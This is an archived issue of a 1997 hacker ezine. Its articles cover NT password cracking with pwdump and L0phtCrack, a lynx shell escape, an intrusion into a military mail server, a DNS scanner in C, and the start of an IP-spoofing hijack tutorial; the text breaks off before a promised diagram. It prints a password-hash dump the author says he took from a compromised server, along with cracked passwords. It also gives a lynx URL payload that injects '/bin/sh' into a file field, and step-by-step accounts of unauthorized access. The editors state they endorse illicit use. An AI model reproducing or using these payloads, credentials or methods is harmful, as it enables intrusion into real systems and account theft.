💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › THTJ › thtj13.t… captured on 2021-12-04 at 18:04:22.
-=-=-=-=-=-=-
������������������������������������������������������������������͸
�The HAVOC Technical Journal - http://www.thtj.com - ��
�������������������������������������������������������������������ٱ
��������������������������������������������������������������������
Vol. 2 | No. 1 | August 1st, 1997 | A HAVOC Bell Systems Publication
Issue 13 "Expand your mind."
_____________________________________________________________________________
-[The HAVOC Technical Journal Issue 13]-
Editorial..............................Scud-O
NT Hacking.............................WaRsPrItE
Breaking out of Freenet Menu Shell.....N-TREEG
How to hack military e-mail servers....WaRsPrItE
DNS Scanner - dns.c....................memor
Connection Hijacking Attack............Merde Fuk
One method to keep root................WaRsPrItE
Carding..more basics for the lame......ArcAngl
Cellular Programming Archives, Pt. I...Phrax
Basic Social Engineering...............WaRsPrItE
DTMF Decoding..........................ArcAngl
Redneck Phreaking......................shoelace
Basic UNIX Scripting...................WaRsPrItE
KEEPING UP WITH THE TELCOS.............ArcAngl
The Weather Report: Federal Numbers....WeatherM
Fake IDs...............................N-TREEG
Oddville, THTJ.........................Scud-O
The News...............................KungFuFox
Logs...................................THTJ
-------------------------------------------------
_____________________________________________________________
The HAVOC Technical Journal - Information
- Editor in Chief : Scud-O, scud@thtj.com
- Assitant Editor : KungFuFox, mazer@cycat.com
- Submissions Editor: Keystroke, keystroke@thepentagon.com
- THTJ email address: thtj@thtj.com
- THTJ website: http://www.thtj.com
- THTJ mailing address: PO BOX 448 Sykesville, MD 21784
The HAVOC Technical Journal Vol. 2, No.1, August 1st, 1997.
A HAVOC Bell Systems Publication. Contents Copyright (�)
1997 HAVOC Bell Systems Publishing. All Rights Reserved.
No part of this publication may be reproduced in whole or
in part without the expressed written consent of HAVOC
Bell Systems Publishing. [No copying THTJ, damnit.]
The HAVOC Technical Journal does in no way endorse the
illicit use of computers, computer networks, and
telecommunications networks, nor is it to be held liable
for any adverse results of pursuing such activities.
[Actually, to tell you the honest to goodness truth, we
do endorse that stuff. We just don't wanna get in trouble
if you try it for yourself and something goes wrong.]
For infomation about using articles published in THTJ, send mail to:
e-mail: thtj@thtj.com
mail: THTJ
c/o HBS
PO Box 448
Sykesville, MD 21784
_____________________________________________________________
[Editorial : by Scud-O] Expanding one's mind
This month I would like to talk to you about a topic that needs to
be addressed. We as a species have begun to slow our development. Nature
leaves survival to the fittest, but with today's technology, more people than
we should have survive. This may sound great, but for a species to advance,
we need to have this survival of the fittest. The best way i can see to
accomplish this is by expanding one's mind. A fast mind can own a fast body
any day. Now, by being a hacker you do show a strive to expand your mind. And
this is good, but only 'real' hacking ( i.e. finding new holes, working to
trace connections and data flow thru machines is real hacking to me. ) mail
bombing, and anarchy are not hacking. they do not expand one's mind. Cookbook
hacking is also not a method to expand your mind. By using a 'cookbook' to
hack you are in fact shutting your mind off. You are simply following
directions, and what serious thought is expelled on that? none.
Expanding your mind uses all of your senses. Expanding your mind
expands to more than just hacking. New experiences help to increase your
knowledge, and thus your mind. Try new things. If early cave men had not
rubbed two wooden sticks together, would we have fire? no. And where would we
be today if we had not discovered fire? Still in a cave. Our minds are waiting
to be expanded. We still have 90% of our brain left to use up. If we don't
expand ourselves, it would be an awful waste of space, would it not? So
go on, expand yourself.
Scud-O , Founder, and Editor in Chief of THTJ
+----------------------------------------+
Scud-O and HBS would like to hear your views on this issue.
Please feel free to e-mail us at: scud@thtj.com
----------------------------------------------
/ ---/ --/ / / | /------/ / /
/--- /-----/------/-----/ / / /
/----------/ /--------/
-of HAVOC Bell Systems-
scud@thtj.com | http://www.thtj.com
-------
������������������������������������������������������������������͸
�The Playlist - by Scud-O - for July 1997 - ��
�������������������������������������������������������������������ٱ
��������������������������������������������������������������������
This list comes from Scud-O's house and car stereos, and these were his
most played CD's during the month of July.
These are not organized into anyway, it is just written up as Scud-O finds
the CD laying around his house.
Artist Title
------ ----------------
Various Saturday Night Fever Soundtrack
Various sm:)e mix session 1 by dj scott henry
Atari Teenage Riot Burn, Berlin, Burn!
The Future Sound of London Accelerator
The Future Sound of London Dead Cities
Various Songs in the key of x ( X-Files )
Fugees The Score
Squirrel Nut Zippers Hot
Beck Odelay
The Prodigy Experience
The Prodigy Music for the Jilted Generation
Prodigy The Fat of the Land
Soul Coughing Ruby Vroom
Soul Coughing Irrestable Bliss
wyclef jean The Carnival
Adam Sandler They're all gunna laugh at you!
Various MTV's amp
Next Month: Scud-O's entire CD collection ( god is that gunna take a while to
type up! )
_____________________________________________________________
NT Hacking by WaRsPrItE
===================================
= Contents =
===================================
I. WaRsPrItE's talk on NT Hacking
II. Info on the pwdump Utility
III. Info on L0phtCrack
IV. The Password file tested
V. Results
===================================
I. WaRsPrItE's talk on NT Hacking
-----------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
First off, I'd like to say that I think that this is an excellent
utility for checking the security of NT networks. However, just like
the now infamous and much over-hyped "SATAN" it's not the skeleton
key into any NT network.
As I say in every fucking article I write, the key is in the basics.
If users pick good passwords then they are next to impossible to
crack. For example, if you use upper case, lower case, and numbers
then there are 1.240176943466 x 10(25) possible combinations. Now add
some punctuation to that! Remember in NT the password can be up to 14
charaters as opposed to the 8 in *NIX. Just to put that that in
perspective, the sun will go nova in about 1.0 x 10(10) years and in
about 1.0 x 10(21) years until all orbits decay by gravitational
radiation. So needless to say my little brute force attack was futile
at best :).
The two programs I used in the attack were L0phtCrack and PWDUMP. I
must say that PWDump [by Jeremy Allison, jra@cygnus.com] works
beautifully. Provided you're logged in as "administrator". So why use
it to hack then?! Because it'll work on any copy of a registry! If
you can swipe some backup media from the server room that might have
a copy of the registry on it :). The NT I exploited and who's password
hashes I included in this zine, I hacked because the moron sysadmin
allowed Domain users to log on locally on the server. During
installation NT asks if you want to make emergency repair disks
(rdisk.exe) and the default choice is "yes". Everytime you run rdisk
NT stores a copy of the Registry in %SystemRoot%\Repair. And the
default permission of that directory is "read" for normal users. Piece
of cake to get a copy of the registry. The problem is, that any
passwords that have been changed since the the last time rdisk was
run won't work (minor glitch). Now that you have a copy of the
registry what do you do with it? Well, find an NT machine that you
can login as "administrator" and run PWDump.exe. In this case I
brown nosed some warez fags and installed it at home :). After that
it's pretty simple, run L0phtCrack.exe with your favorite wordlist or
use it in brute force mode. It took me 6 days on a Pentium 133 to get
three accounts. Amazingly,it got passwords that were 6 charaters long!
Cudos to L0pht!
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQEVAwUBMeMcqX5eXk/jGmY7AQH1yQf/YFpgsAk7iIPEcfOUTiUJ17O2KhujgSfl
8xZgC7gIHR98uzSwqlJerXQlYUFUfNj7CZvO2/SJMeV8bU/bLFF7Ki9zmo+57vkH
z6HfzcF4Wyy/o7y854jOQBPfsXQd6+Nbivc1l1sriaQ4H25hxhLkXA1UFchWD9hk
8xv5nSDPZxlCHobWau/sK+Of92DfFQV1Fw2v5Kyeo0jiWZItaghlMvfYu3eeGtQ0
8sTNg4BDiHQeoQ9/cG+zapKa6UZcPZLyQHXCF36zz23Rtm7bC0jMqUv5BONgWk4W
cuptOS+pmZqsDhf3XWPEHTaugZSluEGUd9A34siF/wjmGwgXN8cO9w==
=yiB2
-----END PGP SIGNATURE-----
II. Info on the pwdump Utility
-------------------------------
Windows NT Password Dump Utility
--------------------------------
This handy utility dumps the password database of an NT machine that
is held in the NT registry (under
HKEY_LOCAL_MACHINE\SECURITY\SAM\Domains\Account\Users) into a valid
smbpasswd format file. This should be a help to Samba administrators
who have a master password database on a Windows NT machine and need
to keep this in sync with the smbpasswd file on their UNIX/Samba
server.
This utility dumps NT password entries in the format :
<user>:<id>:<lanman pw>:<NT pw>:comment:homedir:
Where <user> is the user-name on Windows NT, <id> is the Windows NT
RID (relative ID) - the last 32 bit component of the Windows NT users
SID, <lanman pw> is the users lanman password hash, <NT pw> is the
users Windows NT (md4) password hash - note that if the user has no
password these will be dumped as the string 'NO PASSWORD*****', if the
account is disabled or invalid these are dumped as 32 '*'
characters. The comment is a concatenation of the users full name on
Windows NT and the description field in the Windows NT user-manager
program. The homedir cannot contain ':' characters unfortunately, as
these are used as field separators in the smbpasswd file (as per
UNIX), all ':' characters after drive letters are dumped as '_'
characters.
How to use pwdump
-----------------
Only as a suggestion, I would recommend dumping your NT machines
account database and then creating regular UNIX users (in /etc/passwd)
with the same UNIX account numbers as their NT RID - this will make
replicating the smbpasswd file much easier later on. These /etc/passwd
accounts may have disabled password entries, prohibiting the NT users
from logging onto the UNIX box via telnet (this is similar to removing
the 'log on locally' right on an NT server). This will not prohibit
them from using the Samba box as a server via Samba though. The
created smbpasswd file may then be copied to the
$SAMBA/private/smbpasswd file (where $SAMBA is the base directory you
installed Samba into). If Samba is set up for user level security and
encrypted passwords (set :
security = user encrypted passwords = yes
in your smb.conf file) then Windows NT / 95 users who have logged on
to the NT domain will be able to transparently access the resources on
the Samba box as their correct UNIX user id's (the ones you originally
created). You can then set up a 'AT' job on your NT server to
periodically dump your NT password database into a new smbpasswd file
and copy it over (securely somehow) to the Samba server to keep the
password databases on the two machines in sync.
The pwdump.exe utility can take a \\machine name as argument, it will
then proceed to dump the password database from that machine instead
of the local machine, if it has sufficient privillages to do so. By
default it will dump the password database of the local machine.
NOTE: The passwords dumped by this utility are 'plain-text equivalent'
in the CIFS protocol and *MUST* be protected. The UNIX security on the
smbpasswd file *MUST* be set to (owner root, permissions rw------- -
ie. read/write owner, no access to anyone else).
Future Enhancements
-------------------
As this code decrypts the obfuscication step in the NT password
database it may be reversed, allowing a lanman and md4 hash to be
written into the NT registry for a user account. This would allow a
UNIX/Samba box to be the master repository for user account details,
and the account passwords to be replicated and 'brute forced' into the
NT password database, bypassing the rather baroque NT API mechanisms.
This code doesn't attempt to do this however, this is left as an
'exercise to the reader' (or an enterprising university somewhere :-).
How it works
------------
This utility takes great pains to maintain NT security as it wanders
through the NT SAM areas of the registry. It will not even run is you
are not running as Administrator. Firstly it goes through and adds the
'minimum necessary change' (see Asimov's 'the End of Eternity' :-) to
allow the program to read the password entries. It dumps the users
entries (see the code for details) and then goes back through the
registry restoring the security on all the keys it touched. I have
tested this code on NT Server/Workstation 4.0 and NT 3.51 and have
never had problems, but as always, this code has *NO GUARANTEE*
associated.
Source code
-----------
The source code for this utility may be found in
ftp://samba.anu.edu.au/pub/samba/pwdump/pwdump.c
Note that this code needs a DES library to compile. The one I used in
development is Eric Young's excellent DES library found at :
ftp://ftp.psy.uq.oz.au/pub/Crypto/DES/libdes-4.01.tar.gz
which compiles fine under Windows NT. I used Microsoft Visual C++ 4.x
as the compile environment. The code pwdump.exe is provided for people
who do not have a compiler and is a binary of the program for x86 NT
machines (are there any other kind :-).
Please report all bugs to :
Jeremy Allison,
jra@cygnus.com
libdes, Version 4.01 13-Jan-97
Copyright (c) 1997, Eric Young
All rights reserved.
This program is free software; you can redistribute it and/or modify
it under the terms specified in COPYRIGHT.
--
The primary ftp site for this library is
ftp://ftp.psy.uq.oz.au/pub/Crypto/DES/libdes-x.xx.tar.gz
libdes is now also shipped with SSLeay. Primary ftp site of
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/SSLeay-x.x.x.tar.gz
The best way to build this library is to build it as part of SSLeay.
This kit builds a DES encryption library and a DES encryption program.
It supports ecb, cbc, ofb, cfb, triple ecb, triple cbc, triple ofb,
triple cfb, desx, and MIT's pcbc encryption modes and also has a fast
implementation of crypt(3).
It contains support routines to read keys from a terminal,
generate a random key, generate a key from an arbitrary length string,
read/write encrypted data from/to a file descriptor.
The implementation was written so as to conform with the manual entry
for the des_crypt(3) library routines from MIT's project Athena.
destest should be run after compilation to test the des routines.
rpw should be run after compilation to test the read password routines.
The des program is a replacement for the sun des command. I believe it
conforms to the sun version.
The Imakefile is setup for use in the kerberos distribution.
These routines are best compiled with gcc or any other good
optimising compiler.
Just turn you optimiser up to the highest settings and run destest
after the build to make sure everything works.
I believe these routines are close to the fastest and most portable DES
routines that use small lookup tables (4.5k) that are publicly available.
The fcrypt routine is faster than ufc's fcrypt (when compiling with
gcc2 -O2) on the sparc 2 (1410 vs 1270) but is not so good on other machines
(on a sun3/260 168 vs 336). It is a function of CPU on chip cache size.
[ 10-Jan-97 and a function of an incorrect speed testing program in
ufc which gave much better test figures that reality ].
It is worth noting that on sparc and Alpha CPUs, performance of the DES
library can vary by upto %10 due to the positioning of files after application
linkage.
Eric Young (eay@mincom.oz.au)
----
III. Info on L0phtCrack
-----------------------
L0pht Security Advisory
Advisory released April 10 1997
Program: L0phtcrack.exe - Windows NT password insecurities
Vulnerability Scope: Windows NT
Severity: The L0pht is pleased to release L0phtcrack rev 1.
This program recovers the LANMAN and/or NT Dialect
MD4 plaintext password from output derived from the
SAM registry.
Authors: mudge@l0pht.com
weld@l0pht.com
Intro:
This tool, as with many others, can be used for breaking into systems
in illegal fashions - THAT IS NOT WHAT IT IS INTENDED FOR! We had a
working version done the same day that PWDump was released in order
to audit some of our internal networks. However, as we started
researching more into it we noticed many shortcomings in how MS
security is handled and present some of these in our tool. We take
no responsibility for misuse of this information. It is our belief
that the only way to protect yourself is to fully understand your
vulnerabilities. Unfortunately, for some of these problems we still
don't see immediate solutions. Our particular solution has been to
trust our users, and not let any of our NT machines talk to the internet
(ie filtered very tightly at the perimiter). We are interested in
other solutions.
Overview:
Recently several NT password crackers have emerged. We offer this
one with the belief that it offers some features and functionality
that the current ones do not have.
L0phtcrack will recover passwords from Windows NT registries in a
variety of fashions.
By feeding in the output from PWDump [by Jeremy Allison, jra@cygnus.com]
and a dictionary file, L0phtcrack rev 1 will attempt to retrieve:
1) only the LANMAN plaintext password
2) only the NT Dialect MD4 plaintext password [see reasoning below]
3) Both the LANMAN and MD4 plaintext passwords (by deriving the
MD4 password from the LANMAN output and running through up to
2 to the Nth power permutations)
Alternatively, L0phtcrack gives you the capability to _brute force_ the
entire key space and recover ALL USER PASSWORDS up to 14 characters in
length.
By going through the entire keyspace available, this program
WILL RETURN ALL OF THE PLAINTEXT PASSWORDS (both LANMAN and MD4) up to
and including 14 characters in length (note that the User Login Dialog
box on NT machines limits the amount of characters that can be typed
to 14 for the MD4 dialect. Future releases of this software will enable
brute forcing of up to 16 characters for MD4).
L0phtcrack comes in three flavours:
1) A nice Windows GUI interface so you can point and click.
2) A CLI version for running in "DOS" windows.
3) Source code that is generic enough to build on most Un*x's.
Description:
Here's how it works -
For NT, LANMAN passwords are derived in the following fashion:
. The user password is converted to UPPERCASE
. If the user password is less than 14 bytes, the password is padded
with NULL characters to 14 bytes.
. If the user password is greater than 14 bytes, the password is
truncated to 14 bytes.
. The 14 byte string is split down the middle into two 7 byte strings.
. One 8 byte odd parity des key is derived from each of the 7byte
strings [note1].
. The constant 'magic value' [note2] is then encrypted first
with the first odd parity des key and then with the second. The results
are concatenated. This is the LANMAN OWP [note3].
[note1: There is a significant loss of bits in the str_to_key functions
which derive the 8 byte odd parity DES keys from the 7 byte strings.
This knocks down the possibly key space to attack DES substantially.
Thanks to Hobbit@avian.org for pointing this out to us]
[note2: the constant 'magic value' is derived from the encryption
of 0x4B47532140232425 with a key of all 1's ]
[note3: quickly scanning the LANMAN OWP's it is easy to see who has
passwords that are 7 characters or less. If the second half of the
LANMAN OWP is 0xAAD3B435B51404EE the value for the last seven characters
in the user password were all NULLs.]
For NT, NT Dialect MD4 passwords are derived in the following fashion:
. The users password is converted to Unicode [note4].
. The unicode password is run through MD4 to return a 16 byte value.
This is the MD4 OWP [note5] [note6].
[note4: There is a large amount of confusion as to where Unicode stops.
i.e. is "ABC", which is in actuallity 'A','B','C','\0', encoded
as 'A' '\0' 'B' '\0' 'C' '\0' or 'A' '\0' 'B' '\0' 'C' '\0' '\0' '\0'.
We find that in this situation the former is the case.
[note5: You might say "why do you even bother having an option of doing
_only md4_ when it is much quicker to derive it from the LANMAN
password". To which we would reply "this gives us the ability to
easilly roll in the ability to dictionary attack traffic that we
see on the network. This will be particularly important if the
proposed changes to the CIFS spec go into place. See our S/Key
cracker MONKEY for more of an idea on what's to come".]
[note6: For those who were building md4 crypt-n-compare engines from
inside Microsoft's Visual C++ IDE. The VC++ does not by default
define _MSDOS_, or 8086 which are necesarry to through the byte
ordering into the correct mode in md4.c]
What we do in rev 1 -
In rev 1 of l0phtcrack the user must hand in a password file
in the format of Jeremy Allison's PWDump output. From this
the following actions can be taken.
LANMAN only -
A dictionary is fed in and each word is encrypted using the
LANMAN one round DES format as described above. The list of
users is checked against this encrypted OWP. Any that are
found matching are flagged.
MD4 only -
A dictionary is fed in and each word is encrypted using
md4. The list of users is checked against this encrypted OWP.
Any that are found matching are flagged. See the description
of rev 2 for why this option is important.
LANMAN and md4 -
A dictionary is fed in and each user is first checked against
the LANMAN one round DES OWP. If a match is found, the word
is run through 2 to the power of strlen(word) case permutations
in md4 to return the case sensitive md4 value.
Brute force -
An input string containing the list of valid characters is
run through sequentially in all possible combinations up to
7 characters in length. The first half and second half of the
LANMAN password are compared against these, thus returning
all passwords up to 14 characters in total length. Since the
logon screen will not allow you to enter more than 14 characters
,even though the NT MD4 dialect will allow up to 128, this
should return all users passwords. When a match is found
the word is run through 2 to the power of strlen(word).
By changing the default string that is processed through you
can drastically change the amount of time it takes to brute
through the entire keyspace. Keep in mind that the following
characters are not valid in passwords so they don't need to
be included: '/', '\', '[', ']', ':', ';', '|,' ,'=', ',',
'+', '*', '?', '<', '>' [according to the MS technet information].
For example: if you just want to check all combinations of letters
all you have to run through is ABCDEFGHIJKLMNOPQRSTUVWXYZ.
rev 2 will have this optimized a bit more, in addition to allowing
a remote querry to our tables of precomputed hashes, thus reducing
the problem to that of a table lookup.
Why is it important to be able to attack md4 only? That is much
slower!
The changes being made to the CIFS spec imply that in the future
a server will be able to force a client to use the NT dialect
and not negotiate down. Based upon how the "key exchange" is
done this will be attackable via the hooks put in for md4 only
much in a similar way that our program "MONKEY" will attack
s/key sessions based upon promiscuously viewed network traffic.
errata in rev 1 -
Several of the routines need to be optimized a bit more but the
tool is quite usable and quite fast as it is (100 users and an
an 8 meg dictionary file took under 1 minute on a PPRo 200
with the GUI version. The CLI is slightly faster - the bruting
with a string of "ABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789-_"
took a little over 3 days on a P133).
There are hooks to preen through the user list and instantly kick
out whether a user has a password of 7 characters or less, or
if a users password is greater than 7 chars.
If you specify md4 only it just does a straight dictionary
crypt and compare, if you specify any other method that returns
md4 values it runs through all case possibilities.
The brute forcer is not implemented in the windows GUI version. Use
the command line version for this functionality.
What you can expect to see in rev 2 -
. The functionality of PWDump will be included in the l0phtcrack
program so you won't need to run seperate programs.
. You should be able to pull down registries from remote / local
machines WITHOUT BEING ADMINISTRATOR and WITHOUT NEEDING TO
KNOW THE ADMINISTRATOR's PASSWORD [read this bullet item again!!!]
- we believe we are very close to being able to do this now.
. You will be able to brute force the NT Dialect password up to
16 characters in length for those tricky network users that
never log in via the console.
. The windows GUI will be multi-threaded to take advantage of
multiple processors for dramatically improved brute forcing.
. We should have pre-computed tables of the entire key-space
available so all that needs to be done is a remote table look
up.
L0phtcrack is freely available from the l0pht advisories page:
http://www.l0pht.com/advisories.html
screenshots should be available on the web page in the next couple
of days.
If anyone makes modifications / improvements please mail the diffs to
mudge@l0pht.com.
We hope this tool is usefull,
mudge@l0pht.com , weld@l0pht.com
--------------
For other advisories check out http://www.l0pht.com/advisories.html
--------------
IV. The Password file tested
------------------------------
I edited this to cover my ass and for space requirements.
But it's still a valid file for cracking purposes.
Administrator:500:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
Guest:501:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1004:ACAA2B2B4DB1C2F509752A3293831D17:CA45A13FD16012BF33AA68CDFE061FCD:<user name>::
ccrouter:1009:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>::
<user name>:1010:9C0E16584A1066E6C2265B23734E0DAC:3BC5E21044369A593A461ABB6942A8A5:<user name>::
<user name>:1011:D30B776BDA67C893AAD3B435B51404EE:9507A8AD5A9BDFC54E08F713CB74764F:<user name>::
<user name>:1012:1E074F8EF51098B2AAD3B435B51404EE:4F99B255DB7C1852ED01A80576202901:<user name>::
<user name>:1013:904021AAA178696DAAD3B435B51404EE:E8CD0E4A9E89EAB931DC5338FCBEC54A:<user name>::
<user name>:1014:0A5A9AD4C8774E46C2265B23734E0DAC:6ABC3FA6A76801DFFC63BE7565CFD666:<user name>::
<user name>:1015:3F109A599C4324BD93E28745B8BF4BA6:CA162D1F614293BC30686E0AC2F0E67A:<user name>::
<user name>:1016:7CF5973DF34EA1443B80EEA293B236B6:3E5CC1D5EDB4B91334EFEEF1258D3E50:<user name>::
<user name>:1017:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1018:9EF072AE87B5C9C4AAD3B435B51404EE:6FF0D8A475E5C5B0DFD6A8676F18A829:<user name>::
<user name>:1019:6166F0244140F965AAD3B435B51404EE:ECF1BE0786D6E49470107CAB4E3B3E7B:<user name>::
<user name>:1020:BE4C45E3524EF720F500944B53168930:8BB50ADC452C4EE196775B7B5008B341:<user name>::
Supervisor:1026:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>::
FPNW Service Account:1027:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>::
<user name>:1030:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1040:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1041:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1042:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1043:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1044:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1045:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1046:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1047:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1048:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1049:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1051:0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52:<user name>::
test:1061:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>::
<user name>:1062:6B35A2BA7D7C5B3AAAD3B435B51404EE:3A1B4CFCEB4385D1108253A357B2955E:<user name>::
FILE-SERVER$:1066:79570B2F6875312AA1455905822538D8:D114D50DD21D6ADDEBB008E3231D7A44:::
NT$:1067:07128FE8EEB666E788371ED292FDCCE7:AF7C003BB0917BC28E37F1785E2B9018:::
<user name>:1068:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>::
IUSR_FILE-SERVER:1069:338C0358DECFDA2902386B2E93EFFD10:9393E296495FDC72CCF951D249BB921F:<user name>::
PLUTONIUM$:1070:C31C1D58633BE3ED27892589E3A13688:26BC63583A0EB0DB6E7C6DCA33F3AB00:::
-----
V. Results
-------------
User: [<user name>] Lanman PW: [LOBOS1] NT dialect PW: [lobos1]
User: [<user name>] Lanman PW: [MANDAR] NT dialect PW: [mandar]
User: [<user name>] Lanman PW: [SKIING] NT dialect PW: [skiing]
_____________________________________________________________
Breaking out of Freenet Menu Shell
compiled by N-TREEG
Source and credit goes to: CERT & General Protection Fault
Freenet's are great becuase of the operative word _FREE_. But most have
extremely restrictive menu shells and for the most part, they won't give you
access to your favorite bourne (bash, csh) shell or whatnot. That really
sucks. Do they not trust us with a fully functional interactive shell? ;-)
Well I know that another online zine has published info on how to get to a
bourne shell through pine. That took a good bit of work to set up and get
going correctly. I think this method is a lot easier. All you need is
access to lynx. (Being able to cut and paste helps too if you're as
lazy as I am.)
Here's how:
Start up lynx.
Hit g (for go to).
Enter this into the "URL to open:" field
LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/nul
When it says "Enter a filename:" enter this
/dev/null
When it returns "File exists. Overwrite? (y/n)" hit y
You should hopefully see a beautiful little $ now. There's your local
shell. Have fun. Aren't freenet's grand? ;-)
"HaX0r3d PerceptionS leases ... THTJ ownz."
N-TREEG
http://www.afn.org/~afn56746
HaX0r3d PerceptionS
_____________________________________________________________
How to hack military e-mail servers....WaRsPrItE
-----BEGIN PGP SIGNED MESSAGE-----
Are our military networks safer than their civilian counter parts?
Most military bases, if not all military bases, have a some sort UNIX server
to route non-classified email. Usually, the machine is identified as
emh(electronic mail host).<basename>.<branch>.mil. It is extremely easy for
military members to get an account on one of these servers, simply call up
and request one. As we all know, military members quite often get orders to
other installations, especially those personnel stationed overseas. Due to
this fact, electronic mail hosts quite often have huge password files and
many of the accounts contained in that file are for users that "shipped out"
long ago and never had their account removed from the system. A friend of
mine exploited this one night when we discovered the fact that the server
also had it's security set so that every 6 months a new password containing
numbers or punctuation was required. The problem was that the system didn't
prompt you for your old password before requesting a new one. We tried
connecting to the system via Telnet on a hacked account from a generic ISP
with no luck. The good news was that we were overseas and overseas bases
have phone systems that are independant of the host nations' system. Meaning
there had to be a number to dial to get connected to the base's phone system
if you happened to be off the base. This number is realitively easy to get
just call the local base operator and ask for it. The kicker was that the
local dumbass jarhead Marine base was still running with X-Bar switching not
ESS like us. So here's what we did....
<Our Base> -> <Jarhead's dial up> -> <Our Dial Up> -> <Mail Host modem>
After that, it was simple, we dialed in with a socially engineered legit
account and went to /etc and did a cat of passwd (NOT SHADOW!)and logged it
locally. After gaining a listing of accounts on the system we logged off.
After that, we just simply tried every login until we found one that was
overdue for a passwd change. We then set a password for it and made a note of
the account. If we wanted to pursue it further we could have done a finger on
the account to see which,if any, other servers the individual had accounts on
since the military uses the standard of, <first seven charaters of your last
name + first initial> to determine logins. I'm not offering this story as an
example of my k-rad 3l33t3 skillz. Just to show that simple exploits often
work the best. `Nuff said!
WaRsPrItE
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQEVAwUBMd/EOH5eXk/jGmY7AQFz7Af/d/412J9CqTjyes4ojUo0eLT9+3KwEaXd
1aVaB2+rJQ8oTHMWlfdng14IcisQLRuMsUlSwO7Ud4C/y1eELemu98OeqiP/2t+K
9rCbphpBQ9a2Dhv37HeyxH0z+Gh+0eeeBbipAL/NVCgFQYKM8Jdong4BQwsgoCFR
PZo2eDScMCAQSI9a2MY285UnNGQIoeLXmcN626WEFOSYTC9trhXPdciHhsLtVBuT
zZuXzCYMMwC2+YP5IFyZgCMN29yw0wCe64hwbwo+/nS4Z0PEXvLsZPJO4oQOC5kU
3P7tp8dvWjun4LP8LBt8806pYNgoQlKCJjxtJAhT752+imONDPefIA==
=V9P6
-----END PGP SIGNATURE-----
_____________________________________________________________
/* By memor / hbs */
/* some dns scanner using */
/* host command */
/* Tested on Linux 2.0.30 */
/* last modified: 29/07/97 */
#include<stdio.h>
void main(int argc,char **argv)
{
char commande[50]; /* define commande as char string */
if (argv[1]!=NULL) /* if an argument to the command */
{
int compte=0,pause=0; /* define count & pause */
printf("DNS Scanning from %s.1 to %s.255 \n",argv[1],argv[1]); /* presentation thing */
sprintf(commande,"date"); /* string "date" in commande */
printf("DNS Scanning began at this "); /* presentation thing */
printf("%s :\n",commande); /* print wich command we use (presentation thing) */
system(commande); /* execute command */
for(compte=1;compte<256;compte++) /* counting 1 to 255 */
{
printf("Scan: "); /* presentation thing */
sprintf(commande,"host %s.%i 2>/dev/null",argv[1],compte); /* string ""host %s.%i 2>/dev/null" in command */
printf("resolving %s.%i\n",argv[1],compte); /* presentation thing */
system(commande); /* execute command */
for(pause=0;pause<1000;pause++); /* little pause */
}
sprintf(commande,"date"); /* string "date" in commande */
printf("DNS Scanning ended at this "); /* presentation thing */
printf("%s :\n",commande); /* presentation thing */
system(commande); /* execute command */
}
else /* if no arguments typed */
printf("1997 memor/hbs Usage : dns xxx.xxx.xxx \nfor searching from xxx.xxx.xxx.1 to xxx.xxx.xxx.255\n"); /* presentation thing and usage*/
}
_____________________________________________________________
$$$$$$$$$$$$$$$$$
<<=========-----------$ Connection Hijacking Attack! $----------=========>>
$$$$$$$$$$$$$$$$$
God This is going to take a while!
This article includes all the goodies, and in complete detail tells
how to literally hack a server, using IP Spoofing, one of the most mis
understood terms in the underground. Stupid fuckers have been using IP
spoofing to go on irc and brag to their friends that they are k-rad. This
is not why ip spoofing came around, in this text I will explain to you, in
easy to understand language, that ip spoofing is just a step into the
process of gaining access to a server you are not supposed to have access
to.
The Basics
----------
In order to further understand what I am about to explain you must have a
general knowledge of several things that I will explain in the following
paragraphs...So no need to start to pout yet ;)
Three way Handshakes
--------------------
In order to start an actual data transfer of any kind on a network
you must have what you call a "three way handshake" it goes much like this.
You send what is called a SYN packet to a host, the SYN Packet has headers
which in turn tell the host that you want to connect to him, the host send
you back an ACK command, which tells you that its alive, and open for
connections, then you again send out an ACK Command to the host telling it
that your still alive, and the data transfer can begin. If that's a little
confusing, I agree, its confusing in words, but let me make a small diagram
on what a three way handshake looks like :
